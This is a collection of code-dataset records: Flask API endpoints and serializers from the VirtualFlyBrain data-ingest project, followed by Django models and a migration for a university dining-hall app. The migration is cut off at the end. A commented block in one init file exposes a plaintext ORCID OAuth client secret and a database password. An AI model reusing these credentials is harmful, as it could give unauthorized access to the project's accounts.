fields.List(fields.Nested(dataset))\n# })\n\nproject = api.model('Project', {\n 'id': fields.String(readonly=True, description='The unique, four-letter identifier for this project.'),\n 'primary_name': fields.String(readonly=False, description='The primary name for this project.'),\n 'description': fields.String(readonly=False, description='Short description of this project project.'),\n 'start': fields.Integer(readonly=False, min=0, description='The start id range for this project.')\n})\n\nuser = api.model('User', {\n 'orcid': fields.String(readonly=True, description='The ORCID for this user.'),\n 'primary_name': fields.String(readonly=False, description='The name of this user.'),\n 'apikey': fields.String(readonly=False, description='The current API key for this user.'),\n 'role': fields.String(readonly=False, description='The role of this user.'),\n 'email': fields.String(readonly=False, description='The email of this user.'),\n 'manages_projects': fields.List(fields.String(readonly=False), description='A list of project ids this user manages.'),\n})\n\nneuron_type = api.model('NeuronType', {\n 'id': fields.String(readonly=True, description='The unique identifier for this neuron type.'),\n 'parent': fields.String(readonly=False, description='The unique identifier of the parent of this neuron type.'),\n 'label': fields.String(readonly=False, description='Unique name for this neuron type.'),\n 'exemplar': fields.String(readonly=False, description='VFB ID of image which serves as the exemplar for this type.'),\n 'synonyms': fields.List(fields.String(readonly=False), description='List of synonyms of this neuron type.'),\n})\n\nsite = api.model('Site', {\n 'id': fields.String(readonly=True, description='The unique identifier for this site or web resource.'),\n 'url': fields.String(readonly=False, description='The unique identifier for this site or web resource.'),\n 'short_form': fields.String(readonly=False, description='Short description of this site or web resource.'),\n})\n\nsplit = api.model('Split', {\n 'id': fields.String(readonly=True, description='The unique identifier for this split.'),\n 'dbd': fields.String(readonly=False, description='The DNA-binding domain (DBD) hemidriver.'),\n 'ad': fields.String(readonly=False, description='The activation domain (AD) hemidriver.'),\n 'synonyms': fields.List(fields.String(readonly=False), description='List of synonyms of this split.'),\n 'xrefs': fields.List(fields.String(required=False), description='Associated xrefs.'),\n})\n\nsplit_driver = api.model('SplitDriver', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this split driver - will be ignored when posting new split drivers.'),\n #'orcid': fields.String(required=True, description='The ORCID of the user'),\n 'primary_name': fields.String(required=True, description='Primary name of the split driver.'),\n 'datasetid': fields.String(required=True, description='Dataset ID.'),\n 'projectid': fields.String(required=False, description='Project ID.'),\n #'type_specimen': fields.String(required=False, description='Type specimen of the neuron (optional)'),\n 'alternative_names': fields.List(fields.String(required=False), description='List of alternative names / synonyms.'),\n 'external_identifiers': fields.List(fields.Nested(external_identifier), description='List of external identifiers.'),\n 'classification': fields.List(fields.String(required=True), description='Type/Superclass of the split driver.'),\n 'classification_comment': fields.String(required=False, description='Additional comment about the type/superclass of the split driver.'),\n 'template_id': fields.String(required=True, description='ID of the template used (can be found on VFB website)'),\n 'imaging_type': fields.String(required=False, description='Imaging Type'),\n 'filename': fields.String(required=True, description='Name of the file uploaded to VFB (with extension).'),\n 'driver_line': fields.List(fields.String(required=False), description='Driver line'),\n 'neuropils': fields.List(fields.String(required=False), description='Neuropils'),\n 'part_of': fields.List(fields.String(required=False), description='Part of'),\n 'input_neuropils': fields.List(fields.String(required=False), description='Input neuropils'),\n 'output_neuropils': fields.List(fields.String(required=False), description='Output neuropils'),\n 'comment': fields.String(required=True, description='Comment about the split driver'),\n 'has_part': fields.List(fields.String(required=False), description='List of neurons to annotate via has_part'),\n})\n\nlist_of_split_drivers = api.model('SplitDriverList', {\n 'split_drivers': fields.List(fields.Nested(split_driver))\n})\n"
},
{
"alpha_fraction": 0.7193877696990967,
"alphanum_fraction": 0.7385203838348389,
"avg_line_length": 51.33333206176758,
"blob_id": "d5afdc7ff252c8d28b064ad52431162aaac7cce1",
"content_id": "f97a2921fbab70d25123ee31a88e6d8d9207337d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 15,
"path": "/vfb_curation_api/database/repository/__init__.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import os\nfrom vfb_curation_api.database.repository.repository import VFBKB\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME (reporistor/__init__.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# os.environ[\"KBserver\"] = \"http://localhost:7474\"\n# os.environ[\"KBuser\"] = \"neo4j\"\n# os.environ[\"KBpassword\"] = \"neo\"\n# os.environ[\"LOAD_TEST_DATA\"] = \"True\"\n# os.environ['CLIENT_ID_AUTHORISATION'] = \"APP-ENQTIY7Z904S6O1W\"\n# os.environ['CLIENT_SECRET_AUTHORISATION'] = \"4ad3c8ae-2359-44c1-af6a-59c3ce50e3f6\"\n# os.environ['REDIRECT_URI_AUTHORISATION'] = \"http://localhost:8080/dataingest-ui/login\"\n# os.environ['ENDPOINT_AUTHORISATION_TOKEN'] = \"https://orcid.org/oauth/token\"\ndb = VFBKB()"
},
{
"alpha_fraction": 0.519336998462677,
"alphanum_fraction": 0.7182320356369019,
"avg_line_length": 15.545454978942871,
"blob_id": "1747f5b171f3b2b5020bb2629041528f17118882",
"content_id": "ec2bfadbb186e90441bd9f8777faf4aef769e767",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 181,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "flask-restplus==0.13\nFlask-SQLAlchemy==2.4.1\nneo4jrestclient==2.1.1\nbase36==0.1.1\nflask==1.1.1\nWerkzeug==0.16.0\npsycopg2==2.8.4\norcid==1.0.3\nJinja2==3.0.3\nitsdangerous==2.0.1\npandas"
},
{
"alpha_fraction": 0.5319029092788696,
"alphanum_fraction": 0.5420666337013245,
"avg_line_length": 34.77777862548828,
"blob_id": "b61eaa669438df7dc8f8beff6ed23342766cf77f",
"content_id": "a006c7ea057313ce8694caf7d98680d365b24a2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3542,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 99,
"path": "/vfb_curation_api/api/vfbid/endpoints/neuron.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask import request\nfrom flask_restplus import Resource\nfrom vfb_curation_api.api.vfbid.business import create_neuron, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import neuron, list_of_neurons\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.database.repository import db\nfrom flask_restplus import reqparse, marshal\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neuron', description='Operations related to neurons')\n\nparser = reqparse.RequestParser()\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass NeuronResource(Resource):\n @api.response(201, 'Neuron successfully created.')\n @api.expect(list_of_neurons)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n out = dict()\n try:\n if valid_user(apikey, orcid):\n nid = create_neuron(request.json, orcid)\n if isinstance(nid,dict) and 'error' in nid:\n return nid\n else:\n n = db.get_neuron(nid, orcid=orcid)\n print(\"0-0-0-0-0-0\")\n print(n)\n if isinstance(n, list) \\\n and any(isinstance(n_result, dict) for n_result in n) \\\n and any(\"error\" in n_result for n_result in n):\n return n, 403\n elif isinstance(n, dict) and 'error' in n:\n return n, 403\n else:\n out['neurons'] = marshal(n, neuron)\n return out, 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n\n\n @api.param('neuronid', 'Neuron id', required=True)\n @api.response(404, 'Dataset not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('neuronid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n neuronid = args['neuronid']\n return get_neuron(apikey, orcid, neuronid)\n\n\ndef get_neuron(self, apikey, orcid, neuronid):\n out = dict()\n try:\n if valid_user(apikey, orcid):\n n = db.get_neuron(neuronid, orcid=orcid)\n if isinstance(n,dict) and 'error' in n:\n return n\n return marshal(n, neuron), 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n"
},
{
"alpha_fraction": 0.6927329897880554,
"alphanum_fraction": 0.6951026916503906,
"avg_line_length": 36.235294342041016,
"blob_id": "215777a291d80933344cdb2e63764372436115c8",
"content_id": "74cba0e552bbd9d7d224f1c0388fd1edafcaa4f7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 34,
"path": "/vfb_curation_api/api/vfbid/endpoints/neurons.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import neuron\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neurons', description='Operations related to lists of neurons')\n\n\[email protected]('/')\[email protected](404, 'No neurons found.')\[email protected]('apikey', 'Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('datasetid', 'The ID of the dataset the neuron image belongs to.', required=True)\nclass NeuronList(Resource):\n\n @api.marshal_with(neuron, skip_none=True)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('datasetid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n datasetid = args['datasetid']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_all_neurons(orcid=orcid,datasetid=datasetid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.720588207244873,
"alphanum_fraction": 0.7239819169044495,
"avg_line_length": 34.31999969482422,
"blob_id": "33123714440cc259a118593e2971943ff8e9dedc",
"content_id": "3fdd6a0a69866861a2be17ff2112614badf776b4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 884,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 25,
"path": "/vfb_curation_api/api/vfbid/endpoints/login.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('login', description='Authentication')\n\n\[email protected]('/')\[email protected](404, 'User could not be authenticated.')\[email protected]('code','Your ORCID authorisation code')\[email protected]('redirect_uri','The redirect URI with which the original authorisation code request was done.')\nclass Login(Resource):\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('code', type=str, required=True)\n parser.add_argument('redirect_uri',type=str, required=True)\n args = parser.parse_args()\n return db.authenticate(args['code'],args['redirect_uri'])\n\n"
},
{
"alpha_fraction": 0.5591655373573303,
"alphanum_fraction": 0.5663474798202515,
"avg_line_length": 39.05479431152344,
"blob_id": "a663f207e0bf142e194a9502290361b8eaea7a16",
"content_id": "19b562ebd7c79927e215bf77188225d165a146f2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2924,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 73,
"path": "/vfb_curation_api/api/vfbid/endpoints/ep_split.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_ep_split, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import list_of_split_drivers, split_driver\nfrom vfb_curation_api.api.vfbid.endpoints.neuron import get_neuron\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('ep_split', description='Operations related to EP/Split')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass EpSplitResource(Resource):\n\n @api.response(201, 'EP/Split successfully created.')\n @api.expect(list_of_split_drivers)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n out = dict()\n try:\n if valid_user(apikey, orcid):\n nid = create_ep_split(request.json, orcid, False)\n if isinstance(nid,dict) and 'error' in nid:\n return nid\n else:\n n = db.get_neuron(nid, orcid=orcid)\n print(n)\n if isinstance(n, list) \\\n and any(isinstance(n_result, dict) for n_result in n) \\\n and any(\"error\" in n_result for n_result in n):\n return n, 403\n elif isinstance(n, dict) and 'error' in n:\n return n, 403\n else:\n out['neurons'] = marshal(n, split_driver)\n return out, 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n\n @api.param('epsplitid', 'EP/Split id', required=True)\n @api.response(404, 'EP/Split not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('epsplitid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n epsplitid = args['epsplitid']\n return get_neuron(apikey, orcid, epsplitid)\n"
}
] | 27 |
akatsukidev/comedunt
|
https://github.com/akatsukidev/comedunt
|
8ad0960f4d20d3a9dee61021ec1e86225aa4f6e9
|
8d1b4aa31d1f66eb9527e63b016596c3343d3c3f
|
4e77022085efe7550de8f68fa3d3249adb1d9ce0
|
refs/heads/master
| 2016-09-07T04:04:01.874924 | 2014-09-04T05:21:43 | 2014-09-04T05:21:43 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7147738933563232,
"alphanum_fraction": 0.7245005369186401,
"avg_line_length": 32.06956481933594,
"blob_id": "5634a97a53bdb2af2f02c86769a3e3974b505e39",
"content_id": "b8f4923054b57fb4c51bad9bdb24645fe07b8546",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3804,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 115,
"path": "/victor/models.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n#Clase que almacena el nivel academico de los comensales\nclass Ciclo(models.Model):\n\tnombre = models.CharField(max_length = 2)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#Clase que almacena las facultades de la universidad\nclass Facultad(models.Model):\n\tnombre = models.CharField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#Clase que almacena las escuelas de la universidad\nclass Escuela(models.Model):\n\tnombre = models.CharField(max_length = 140)\n\tfacultad = models.ForeignKey(Facultad)\n\tdef __unicode__(self): \n\t\treturn \"%s - %s\" % (self.nombre, self.facultad.nombre)\n\n#clase que almacena el saldo en soles y en numero de comidas del comensal\nclass Saldo(models.Model):\n\tdinero_soles = models.FloatField()\n\tnum_comidas = models.IntegerField()\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dinero_soles, self.num_comidas)\n\n#clase que almacena los dias de la semana\nclass Dia_Semana(models.Model):\n\tdia = models.CharField(max_length = 10)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.dia)\n\n#clase que almacena el intervalo de dias que el comensal hara uso del servicio\nclass Horario(models.Model):\n\tdia_inicio = models.ForeignKey(Dia_Semana, related_name=\"dia_inicio\")\n\tdia_fin = models.ForeignKey(Dia_Semana, related_name=\"dia_fin\")\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dia_inicio, self.dia_fin)\n\n\n#clase que almacena Fechas en que el comensal no registrar asistencia\nclass Fecha_Roja(models.Model):\n\tdia_inicio = models.DateField(auto_now = False)\n\tdia_fin = models.DateField(auto_now = False)\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dia_inicio, self.dia_fin)\n\n\n#clase que almacena los Horarios de los platos (maniana,tarde, noche)\nclass Horario_Plato(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#clase que almacena los platos que se cosinan en el comedor\nclass Plato(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\thorario = models.ForeignKey(Horario_Plato)\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#clase que almacena las categorias del comensal\nclass Categoria(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\tprecio = models.FloatField()\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n\n#clase que almacena los platos que se cosinan en el comedor\nclass Comensal(models.Model):\n\tnum_matricula = models.CharField(max_length = 40, primary_key=True)\n\tnombre = models.CharField(max_length = 40)\n\tapellidos = models.CharField(max_length = 140)\n\testado = models.BooleanField()\n\tdni = models.CharField(max_length = 9)\n\tdireccion = models.CharField(max_length = 140)\n\tgastos_totales = models.FloatField()\n\t#claves foraneas\n\tescuela = models.ForeignKey(Escuela)\n\tciclo = models.ForeignKey(Ciclo)\n\tcategoria = models.ForeignKey(Categoria)\n\tsaldo = models.ForeignKey(Saldo)\n\tfechas_rojas = models.ForeignKey(Fecha_Roja)\n\thorario = models.ForeignKey(Horario)\n\n\tdef __unicode__(self): \n\t\treturn \"%s %s\" % (self.nombre, self.apellidoPat)\n\n#Clase que almacena las asistencias al comedor\nclass Asistencia(models.Model):\n\tfecha_hora = models.DateTimeField(auto_now = False)\n\testado = models.BooleanField()\n\t#claves foraneas\n\tplato = models.ForeignKey(Plato)\n\tcomensal = models.ForeignKey(Comensal)\n\n\tdef __unicode__(self): \n\t\treturn \"%s - %s - %s - %s\" % (self.fecha_hora, self.estado, self.plato, self.comensal)\n\n\n\n\n\n\"\"\"clase que almacena la especialidad de los trabajadores\nclass Especialidad(model,Model):\n\tnombre = models.CharField(max_length = 40)\n\tsalario = models.FloatField()\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\"\"\"\n\n"
},
{
"alpha_fraction": 0.5617561936378479,
"alphanum_fraction": 0.5670633912086487,
"avg_line_length": 51.03765869140625,
"blob_id": "b79263c82858edbe4094ba04145d001a206935ec",
"content_id": "fec5579f46def93307a96cce348b2b63e6e26b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12436,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 239,
"path": "/victor/migrations/0001_initial.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'Ciclo'\n db.create_table(u'victor_ciclo', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=2)),\n ))\n db.send_create_signal(u'victor', ['Ciclo'])\n\n # Adding model 'Facultad'\n db.create_table(u'victor_facultad', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Facultad'])\n\n # Adding model 'Escuela'\n db.create_table(u'victor_escuela', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('facultad', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Facultad'])),\n ))\n db.send_create_signal(u'victor', ['Escuela'])\n\n # Adding model 'Saldo'\n db.create_table(u'victor_saldo', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dinero_soles', self.gf('django.db.models.fields.FloatField')()),\n ('num_comidas', self.gf('django.db.models.fields.IntegerField')()),\n ))\n db.send_create_signal(u'victor', ['Saldo'])\n\n # Adding model 'Dia_Semana'\n db.create_table(u'victor_dia_semana', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia', self.gf('django.db.models.fields.CharField')(max_length=10)),\n ))\n db.send_create_signal(u'victor', ['Dia_Semana'])\n\n # Adding model 'Horario'\n db.create_table(u'victor_horario', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia_inicio', self.gf('django.db.models.fields.related.ForeignKey')(related_name='dia_inicio', to=orm['victor.Dia_Semana'])),\n ('dia_fin', self.gf('django.db.models.fields.related.ForeignKey')(related_name='dia_fin', to=orm['victor.Dia_Semana'])),\n ))\n db.send_create_signal(u'victor', ['Horario'])\n\n # Adding model 'Fecha_Roja'\n db.create_table(u'victor_fecha_roja', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia_inicio', self.gf('django.db.models.fields.DateField')()),\n ('dia_fin', self.gf('django.db.models.fields.DateField')()),\n ))\n db.send_create_signal(u'victor', ['Fecha_Roja'])\n\n # Adding model 'Horario_Plato'\n db.create_table(u'victor_horario_plato', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ))\n db.send_create_signal(u'victor', ['Horario_Plato'])\n\n # Adding model 'Plato'\n db.create_table(u'victor_plato', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('horario', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Horario_Plato'])),\n ('descripcion', self.gf('django.db.models.fields.TextField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Plato'])\n\n # Adding model 'Categoria'\n db.create_table(u'victor_categoria', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('precio', self.gf('django.db.models.fields.FloatField')()),\n ('descripcion', self.gf('django.db.models.fields.TextField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Categoria'])\n\n # Adding model 'Comensal'\n db.create_table(u'victor_comensal', (\n ('num_matricula', self.gf('django.db.models.fields.CharField')(max_length=40, primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('apellidos', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('estado', self.gf('django.db.models.fields.BooleanField')()),\n ('dni', self.gf('django.db.models.fields.CharField')(max_length=9)),\n ('direccion', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('escuela', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Escuela'])),\n ('ciclo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Ciclo'])),\n ('categoria', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Categoria'])),\n ('saldo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Saldo'])),\n ('fechas_rojas', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Fecha_Roja'])),\n ('horario', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Horario'])),\n ))\n db.send_create_signal(u'victor', ['Comensal'])\n\n # Adding model 'Asistencia'\n db.create_table(u'victor_asistencia', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('fecha_hora', self.gf('django.db.models.fields.DateTimeField')()),\n ('estado', self.gf('django.db.models.fields.BooleanField')()),\n ('plato', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Plato'])),\n ('comensal', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Comensal'])),\n ))\n db.send_create_signal(u'victor', ['Asistencia'])\n\n\n def backwards(self, orm):\n # Deleting model 'Ciclo'\n db.delete_table(u'victor_ciclo')\n\n # Deleting model 'Facultad'\n db.delete_table(u'victor_facultad')\n\n # Deleting model 'Escuela'\n db.delete_table(u'victor_escuela')\n\n # Deleting model 'Saldo'\n db.delete_table(u'victor_saldo')\n\n # Deleting model 'Dia_Semana'\n db.delete_table(u'victor_dia_semana')\n\n # Deleting model 'Horario'\n db.delete_table(u'victor_horario')\n\n # Deleting model 'Fecha_Roja'\n db.delete_table(u'victor_fecha_roja')\n\n # Deleting model 'Horario_Plato'\n db.delete_table(u'victor_horario_plato')\n\n # Deleting model 'Plato'\n db.delete_table(u'victor_plato')\n\n # Deleting model 'Categoria'\n db.delete_table(u'victor_categoria')\n\n # Deleting model 'Comensal'\n db.delete_table(u'victor_comensal')\n\n # Deleting model 'Asistencia'\n db.delete_table(u'victor_asistencia')\n\n\n models = {\n u'victor.asistencia': {\n 'Meta': {'object_name': 'Asistencia'},\n 'comensal': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Comensal']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fecha_hora': ('django.db.models.fields.DateTimeField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'plato': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Plato']\"})\n },\n u'victor.categoria': {\n 'Meta': {'object_name': 'Categoria'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'precio': ('django.db.models.fields.FloatField', [], {})\n },\n u'victor.ciclo': {\n 'Meta': {'object_name': 'Ciclo'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '2'})\n },\n u'victor.comensal': {\n 'Meta': {'object_name': 'Comensal'},\n 'apellidos': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'categoria': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Categoria']\"}),\n 'ciclo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Ciclo']\"}),\n 'direccion': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'dni': ('django.db.models.fields.CharField', [], {'max_length': '9'}),\n 'escuela': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Escuela']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fechas_rojas': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Fecha_Roja']\"}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario']\"}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'num_matricula': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),\n 'saldo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Saldo']\"})\n },\n u'victor.dia_semana': {\n 'Meta': {'object_name': 'Dia_Semana'},\n 'dia': ('django.db.models.fields.CharField', [], {'max_length': '10'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.escuela': {\n 'Meta': {'object_name': 'Escuela'},\n 'facultad': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Facultad']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.facultad': {\n 'Meta': {'object_name': 'Facultad'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.fecha_roja': {\n 'Meta': {'object_name': 'Fecha_Roja'},\n 'dia_fin': ('django.db.models.fields.DateField', [], {}),\n 'dia_inicio': ('django.db.models.fields.DateField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario': {\n 'Meta': {'object_name': 'Horario'},\n 'dia_fin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': 